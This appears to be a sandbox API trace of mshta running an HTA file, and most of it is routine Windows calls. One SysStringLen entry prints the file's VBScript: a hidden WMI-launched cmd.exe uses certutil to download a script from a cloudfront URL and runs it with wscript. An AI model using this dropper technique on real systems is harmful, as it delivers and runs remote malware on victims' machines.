[0038.766] memcpy_s (in: _Destination=0xb8a8c3c952, _DestinationSize=0x1ffe, _Source=0xb8a8a2ee90, _SourceSize=0x4 | out: _Destination=0xb8a8c3c952) returned 0x0
[0038.766] SetTimer (hWnd=0x70064, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008
[0038.767] IUnknown:AddRef (This=0xb8a8c38780) returned 0x2
[0038.767] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x8
[0038.767] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0038.767] IInternetSecurityManager:MapUrlToZone (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pdwZone=0xb8a8a2ec60, dwFlags=0x0 | out: pdwZone=0xb8a8a2ec60*=0xffffffff) returned 0x800c0011
[0038.767] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0038.767] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0038.767] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0038.767] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0xb8a8c38780, pUri=0xb8a8c431a0, dwAction=0x2106, pPolicy=0xb8a8a2ec50, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0, pdwOutFlags=0xb8a8a2ec90 | out: pPolicy=0xb8a8a2ec50*=0x0, pdwOutFlags=0xb8a8a2ec90*=0x0) returned 0x0
[0038.767] IInternetSecurityManager:ProcessUrlAction (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", dwAction=0x2106, pPolicy=0xb8a8a2ec50, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0xb8a8a2ec50*=0x0) returned 0x0
[0038.767] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0038.767] IUnknown:Release (This=0xb8a8c38780) returned 0x1
[0038.767] IUnknown:Release (This=0xb8a8c431a0) returned 0x7
[0038.769] StrChrW (lpStart="language", wMatch=0x3a) returned 0x0
[0038.769] memcpy_s (in: _Destination=0xb8a8c3c954, _DestinationSize=0x1ffc, _Source=0xb8a8a2f2a0, _SourceSize=0xc | out: _Destination=0xb8a8c3c954) returned 0x0
[0038.769] ParseURLW (in: pcszURL="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", ppu=0xb8a8a2f300 | out: ppu=0xb8a8a2f300) returned 0x0
[0038.769] IUnknown:AddRef (This=0xb8a8c38780) returned 0x2
[0038.769] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x8
[0038.770] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0038.770] IInternetSecurityManager:MapUrlToZone (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pdwZone=0xb8a8a2f260, dwFlags=0x0 | out: pdwZone=0xb8a8a2f260*=0xffffffff) returned 0x800c0011
[0038.770] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0038.770] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0038.770] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0038.770] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0xb8a8c38780, pUri=0xb8a8c431a0, dwAction=0x1400, pPolicy=0xb8a8a2f250, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0xb8a8a2f290 | out: pPolicy=0xb8a8a2f250*=0x0, pdwOutFlags=0xb8a8a2f290*=0x0) returned 0x0
[0038.770] IInternetSecurityManager:ProcessUrlAction (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", dwAction=0x1400, pPolicy=0xb8a8a2f250, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0xb8a8a2f250*=0x0) returned 0x0
[0038.770] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0038.770] IUnknown:Release (This=0xb8a8c38780) returned 0x1
[0038.770] IUnknown:Release (This=0xb8a8c431a0) returned 0x7
[0038.770] ParseURLW (in: pcszURL="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", ppu=0xb8a8a2f0e0 | out: ppu=0xb8a8a2f0e0) returned 0x0
[0038.770] IUnknown:AddRef (This=0xb8a8c38780) returned 0x2
[0038.770] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x8
[0038.770] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0038.770] IInternetSecurityManager:MapUrlToZone (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pdwZone=0xb8a8a2f040, dwFlags=0x0 | out: pdwZone=0xb8a8a2f040*=0xffffffff) returned 0x800c0011
[0038.770] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0038.770] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0038.770] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0038.770] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0xb8a8c38780, pUri=0xb8a8c431a0, dwAction=0x1400, pPolicy=0xb8a8a2f030, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0xb8a8a2f070 | out: pPolicy=0xb8a8a2f030*=0x0, pdwOutFlags=0xb8a8a2f070*=0x0) returned 0x0
[0038.770] IInternetSecurityManager:ProcessUrlAction (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", dwAction=0x1400, pPolicy=0xb8a8a2f030, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0xb8a8a2f030*=0x0) returned 0x0
[0038.770] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0038.770] IUnknown:Release (This=0xb8a8c38780) returned 0x1
[0038.770] IUnknown:Release (This=0xb8a8c431a0) returned 0x7
[0038.770] ParseURLW (in: pcszURL="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", ppu=0xb8a8a2f000 | out: ppu=0xb8a8a2f000) returned 0x0
[0038.770] IUnknown:AddRef (This=0xb8a8c38780) returned 0x2
[0038.770] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x8
[0038.770] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0038.770] IInternetSecurityManager:MapUrlToZone (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pdwZone=0xb8a8a2ef60, dwFlags=0x0 | out: pdwZone=0xb8a8a2ef60*=0xffffffff) returned 0x800c0011
[0038.770] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0038.770] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0038.770] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0038.770] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0xb8a8c38780, pUri=0xb8a8c431a0, dwAction=0x1400, pPolicy=0xb8a8a2ef50, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0xb8a8a2ef90 | out: pPolicy=0xb8a8a2ef50*=0x0, pdwOutFlags=0xb8a8a2ef90*=0x0) returned 0x0
[0038.770] IInternetSecurityManager:ProcessUrlAction (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", dwAction=0x1400, pPolicy=0xb8a8a2ef50, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0xb8a8a2ef50*=0x0) returned 0x0
[0038.770] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0038.770] IUnknown:Release (This=0xb8a8c38780) returned 0x1
[0038.770] IUnknown:Release (This=0xb8a8c431a0) returned 0x7
[0038.770] StrCmpICW (pszStr1="VBScript", pszStr2="javascript") returned 12
[0038.771] StrCmpICW (pszStr1="VBScript", pszStr2="javascript") returned 12
[0038.771] StrCmpICW (pszStr1="VBScript", pszStr2="ecmascript") returned 17
[0038.771] StrCmpICW (pszStr1="VBScript", pszStr2="ecmascript") returned 17
[0038.771] StrCmpICW (pszStr1="VBScript", pszStr2="x-javascript") returned -2
[0038.771] StrCmpICW (pszStr1="VBScript", pszStr2="jscript") returned 12
[0038.771] StrCmpICW (pszStr1="VBScript", pszStr2="vbscript") returned 0
[0038.771] CoCreateInstance (in: rclsid=0xb8a8a2eff0*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffb233e6fa8*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0xb8a8a2ef78 | out: ppv=0xb8a8a2ef78*=0xc0aa9f7480) returned 0x0
[0038.901] __dllonexit () returned 0x7ffb250ef980
[0038.901] __dllonexit () returned 0x7ffb250ef990
[0038.901] __dllonexit () returned 0x7ffb250ef9a0
[0038.902] GetUserDefaultLCID () returned 0x409
[0038.902] GetVersion () returned 0x23f00206
[0038.902] GetModuleHandleW (lpModuleName="api-ms-win-core-processthreads-l1-1-2.dll") returned 0x7ffb3d260000
[0038.902] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="QueryProtectedPolicy") returned 0x7ffb3a86d460
[0038.902] VirtualProtect (in: lpAddress=0x7ffb25136670, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0xb8a8a2c9e0 | out: lpflOldProtect=0xb8a8a2c9e0*=0x2) returned 1
[0038.902] VirtualProtect (in: lpAddress=0x7ffb25136670, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0xb8a8a2c9e0 | out: lpflOldProtect=0xb8a8a2c9e0*=0x4) returned 1
[0038.903] GetUserDefaultLCID () returned 0x409
[0038.903] GetACP () returned 0x4e4
[0038.903] LoadLibraryExA (lpLibFileName="amsi.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb30c90000
[0038.949] GetProcAddress (hModule=0x7ffb30c90000, lpProcName="AmsiInitialize") returned 0x7ffb30c92260
[0038.949] GetProcAddress (hModule=0x7ffb30c90000, lpProcName="AmsiScanString") returned 0x7ffb30c926b0
[0038.949] AmsiInitialize () returned 0x0
[0039.006] IUnknown:AddRef (This=0xb8a8c38780) returned 0x2
[0039.006] IUnknown:AddRef (This=0xb8a8c431a0) returned 0x8
[0039.006] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0039.006] IInternetSecurityManager:MapUrlToZone (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", pdwZone=0xb8a8a2ed60, dwFlags=0x0 | out: pdwZone=0xb8a8a2ed60*=0xffffffff) returned 0x800c0011
[0039.006] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0039.006] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0039.006] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0039.006] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0xb8a8c38780, pUri=0xb8a8c431a0, dwAction=0x1401, pPolicy=0xb8a8a2ed50, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0xb8a8a2ed90 | out: pPolicy=0xb8a8a2ed50*=0x0, pdwOutFlags=0xb8a8a2ed90*=0x0) returned 0x0
[0039.006] IInternetSecurityManager:ProcessUrlAction (in: This=0x7ffb238e5d88, pwszUrl="file:///C:/Users/CIIHMN~1/Desktop/SECURE~1.HTA", dwAction=0x1401, pPolicy=0xb8a8a2ed50, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0xb8a8a2ed50*=0x0) returned 0x0
[0039.006] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0039.006] IUnknown:Release (This=0xb8a8c38780) returned 0x1
[0039.006] IUnknown:Release (This=0xb8a8c431a0) returned 0x7
[0039.007] GetCurrentThreadId () returned 0x210
[0039.007] GetCurrentThreadId () returned 0x210
[0039.007] GetCurrentThreadId () returned 0x210
[0039.007] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0039.007] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0xb8a8a2ee10, cchData=6 | out: lpLCData="1252") returned 5
[0039.007] IsValidCodePage (CodePage=0x4e4) returned 1
[0039.008] GetModuleHandleW (lpModuleName="api-ms-win-core-delayload-l1-1-1.dll") returned 0x7ffb3a800000
[0039.008] GetProcAddress (hModule=0x7ffb3a800000, lpProcName="ResolveDelayLoadedAPI") returned 0x7ffb3a85a1b0
[0039.008] GetProcAddress (hModule=0x7ffb3a800000, lpProcName="ResolveDelayLoadsFromDll") returned 0x7ffb3a8be790
[0039.009] ResolveDelayLoadedAPI () returned 0x7ffb3ccf7000
[0039.009] CoCreateInstance (in: rclsid=0x7ffb25137688*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffb25137658*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0xc0aa9f77c8 | out: ppv=0xc0aa9f77c8*=0xb8a8c49390) returned 0x0
[0039.009] IUnknown:AddRef (This=0xb8a8c49390) returned 0x2
[0039.009] ISystemDebugEventFire:BeginSession (This=0xb8a8c49390, guidSourceID=0x7ffb25137678, strSessionName="VBScript:00001792:00000528:00115656") returned 0x0
[0039.009] StrCmpICW (pszStr1="window", pszStr2="window") returned 0
[0039.010] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.010] GetProcAddress (hModule=0x7ffb3c9b0000, lpProcName=0x2) returned 0x7ffb3c9bdd00
[0039.010] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2ee30 | out: lpflOldProtect=0xb8a8a2ee30*=0x4) returned 1
[0039.010] _wcsicmp (_String1="window", _String2="window") returned 0
[0039.010] _wcsicmp (_String1="", _String2="") returned 0
[0039.010] SysStringLen (param_1="\nSub window_onload\n\x09const impersonation = 3\n\x09Const HIDDEN_WINDOW = 12\n\x09Set Locator = CreateObject(\"WbemScripting.SWbemLocator\")\n\x09Set Service = Locator.ConnectServer()\n\x09Service.Security_.ImpersonationLevel=impersonation\n\x09Set objStartup = Service.Get(\"Win32_ProcessStartup\")\n\x09Set objConfig = objStartup.SpawnInstance_\n\x09objConfig.ShowWindow = HIDDEN_WINDOW\n\x09Set Process = Service.Get(\"Win32_Process\")\n\x09Error = Process.Create(\"cmd.exe /c certutil.exe -urlcache -split -f https://dl6zxn23r8r14.cloudfront.net:443/en-US C:\\Users\\Public\\en-US.js && wscript.exe C:\\Users\\Public\\en-US.js\", null, objConfig, intProcessID)\n\x09window.close()\nend sub\n") returned 0x27c
[0039.013] ISystemDebugEventFire:IsActive (This=0xb8a8c49390) returned 0x1
[0039.014] _wcsicmp (_String1="window", _String2="window") returned 0
[0039.014] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0039.014] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0039.015] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0039.015] IsCharSpaceW (wch=0x77) returned 0
[0039.015] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0039.015] IsCharSpaceW (wch=0x77) returned 0
[0039.016] ISystemDebugEventFire:IsActive (This=0xb8a8c49390) returned 0x1
[0039.016] GetCurrentThreadId () returned 0x210
[0039.016] GetCurrentThreadId () returned 0x210
[0039.016] GetCurrentThreadId () returned 0x210
[0039.016] SetEvent (hEvent=0x15c) returned 1
[0039.017] GetTickCount () returned 0x1c3c8
[0039.017] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2f790 | out: lpPerformanceCount=0xb8a8a2f790*=407444900) returned 1
[0039.035] SetEvent (hEvent=0x2e0) returned 1
[0039.036] GetVersionExW (in: lpVersionInformation=0xb8a8a2eec0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x80000082, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xb8a8a2eec0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0039.036] GetKeyboardLayoutList (in: nBuff=32, lpList=0xb8a8a2f020 | out: lpList=0xb8a8a2f020) returned 1
[0039.036] WTSGetActiveConsoleSessionId () returned 0x1
[0039.036] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc081
[0039.037] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc065
[0039.037] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc068
[0039.037] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc07c
[0039.037] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc07d
[0039.037] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc07b
[0039.037] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc078
[0039.037] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc086
[0039.037] RegisterClipboardFormatA (lpszFormat="image/svg+xml") returned 0xc10c
[0039.037] RegisterClipboardFormatA (lpszFormat="msSourceUrl") returned 0xc12a
[0039.038] memcpy_s (in: _Destination=0xb8a8c3c960, _DestinationSize=0x1ff0, _Source=0xb8a8a2f290, _SourceSize=0x4 | out: _Destination=0xb8a8c3c960) returned 0x0
[0039.039] RedrawWindow (hWnd=0x70064, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1
[0039.039] IUnknown:Release (This=0xb8a8c307c0) returned 0x4
[0039.039] IUnknown:Release (This=0xb8a8c30650) returned 0xe
[0039.039] IUnknown:Release (This=0xb8a8c307c0) returned 0x3
[0039.039] IUnknown:Release (This=0xb8a8c30650) returned 0xd
[0039.039] IUnknown:Release (This=0xb8a8c30650) returned 0xc
[0039.039] IUnknown:Release (This=0xb8a8c307c0) returned 0x2
[0039.039] IUnknown:Release (This=0xb8a8c30650) returned 0xb
[0039.039] IUnknown:Release (This=0xb8a8c30650) returned 0xa
[0039.039] IUnknown:Release (This=0xb8a8c30650) returned 0x9
[0039.039] IUnknown:Release (This=0xb8a8c30650) returned 0x8
[0039.039] IUnknown:Release (This=0xb8a8c30650) returned 0x7
[0039.039] IUnknown:Release (This=0xb8a8c385e0) returned 0x0
[0039.040] IUnknown:Release (This=0xb8a8c49970) returned 0x0
[0039.040] memcpy_s (in: _Destination=0xb8a8a2e9a0, _DestinationSize=0xd70, _Source=0x7ffb238e94d0, _SourceSize=0xd70 | out: _Destination=0xb8a8a2e9a0) returned 0x0
[0039.040] memcpy_s (in: _Destination=0xb8a8a2f600, _DestinationSize=0xc0, _Source=0xc0aab1c0c0, _SourceSize=0xc0 | out: _Destination=0xb8a8a2f600) returned 0x0
[0039.041] memcpy_s (in: _Destination=0xc0aab1c6c0, _DestinationSize=0xc0, _Source=0xb8a8a2f600, _SourceSize=0xc0 | out: _Destination=0xc0aab1c6c0) returned 0x0
[0039.043] memcpy_s (in: _Destination=0xb8a8a2ef74, _DestinationSize=0x74, _Source=0xb8a8a2ed90, _SourceSize=0x74 | out: _Destination=0xb8a8a2ef74) returned 0x0
[0039.045] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.045] LoadLibraryExA (lpLibFileName="msls31.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb2dcd0000
[0039.067] GetProcAddress (hModule=0x7ffb2dcd0000, lpProcName=0x3e) returned 0x7ffb2dcf9df0
[0039.067] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e6c0 | out: lpflOldProtect=0xb8a8a2e6c0*=0x4) returned 1
[0039.067] LsGetRubyLsimethods () returned 0x0
[0039.067] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.067] GetProcAddress (hModule=0x7ffb2dcd0000, lpProcName=0x3f) returned 0x7ffb2dcfbce0
[0039.068] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e6c0 | out: lpflOldProtect=0xb8a8a2e6c0*=0x4) returned 1
[0039.068] LsGetTatenakayokoLsimethods () returned 0x0
[0039.068] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.068] GetProcAddress (hModule=0x7ffb2dcd0000, lpProcName=0x42) returned 0x7ffb2dcda350
[0039.068] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e6c0 | out: lpflOldProtect=0xb8a8a2e6c0*=0x4) returned 1
[0039.068] LsGetHihLsimethods () returned 0x0
[0039.068] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.068] GetProcAddress (hModule=0x7ffb2dcd0000, lpProcName=0x3d) returned 0x7ffb2dcfdc90
[0039.068] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e6c0 | out: lpflOldProtect=0xb8a8a2e6c0*=0x4) returned 1
[0039.068] LsGetWarichuLsimethods () returned 0x0
[0039.068] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.069] GetProcAddress (hModule=0x7ffb2dcd0000, lpProcName=0x47) returned 0x7ffb2dcf8aa0
[0039.069] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e6c0 | out: lpflOldProtect=0xb8a8a2e6c0*=0x4) returned 1
[0039.069] LsGetReverseLsimethods () returned 0x0
[0039.069] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.069] GetProcAddress (hModule=0x7ffb2dcd0000, lpProcName=0x1) returned 0x7ffb2dcda580
[0039.069] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e6f0 | out: lpflOldProtect=0xb8a8a2e6f0*=0x4) returned 1
[0039.069] LsCreateContext () returned 0x0
[0039.071] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.071] GetProcAddress (hModule=0x7ffb2dcd0000, lpProcName=0x31) returned 0x7ffb2dce22c0
[0039.071] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e6f0 | out: lpflOldProtect=0xb8a8a2e6f0*=0x4) returned 1
[0039.072] LsSetModWidthPairs () returned 0x0
[0039.073] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.073] GetProcAddress (hModule=0x7ffb2dcd0000, lpProcName=0x34) returned 0x7ffb2dce1ec0
[0039.073] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e400 | out: lpflOldProtect=0xb8a8a2e400*=0x4) returned 1
[0039.073] LsSetBreaking () returned 0x0
[0039.073] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.073] GetProcAddress (hModule=0x7ffb2dcd0000, lpProcName=0x30) returned 0x7ffb2dce2080
[0039.073] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e440 | out: lpflOldProtect=0xb8a8a2e440*=0x4) returned 1
[0039.073] LsSetDoc () returned 0x0
[0039.073] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.073] GetProcAddress (hModule=0x7ffb2dcd0000, lpProcName=0x3) returned 0x7ffb2dcdc000
[0039.073] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2e440 | out: lpflOldProtect=0xb8a8a2e440*=0x4) returned 1
[0039.073] LsCreateLine () returned 0x0
[0039.074] WTSGetActiveConsoleSessionId () returned 0x1
[0039.074] RtlInitializeConditionVariable (in: ConditionVariable=0xc0aab684b0 | out: ConditionVariable=0xc0aab684b0)
[0039.075] RtlInitializeConditionVariable (in: ConditionVariable=0xc0aab684f8 | out: ConditionVariable=0xc0aab684f8)
[0039.075] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.075] LoadLibraryExA (lpLibFileName="d2d1.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb355d0000
[0039.075] GetProcAddress (hModule=0x7ffb355d0000, lpProcName=0x1) returned 0x7ffb35690a20
[0039.075] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2d510 | out: lpflOldProtect=0xb8a8a2d510*=0x4) returned 1
[0039.075] D2D1CreateFactory () returned 0x0
[0039.076] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.076] LoadLibraryExA (lpLibFileName="DWrite.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb314d0000
[0039.183] GetProcAddress (hModule=0x7ffb314d0000, lpProcName="DWriteCreateFactory") returned 0x7ffb31548d00
[0039.183] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2d510 | out: lpflOldProtect=0xb8a8a2d510*=0x4) returned 1
[0039.183] DWriteCreateFactory () returned 0x0
[0039.183] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0039.183] GetProcAddress (hModule=0x7ffb37bf0000, lpProcName="CreateDXGIFactory1") returned 0x7ffb37bf6180
[0039.183] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2d560 | out: lpflOldProtect=0xb8a8a2d560*=0x4) returned 1
[0039.184] CreateDXGIFactory1 () returned 0x0
[0039.184] GetTickCount () returned 0x1c474
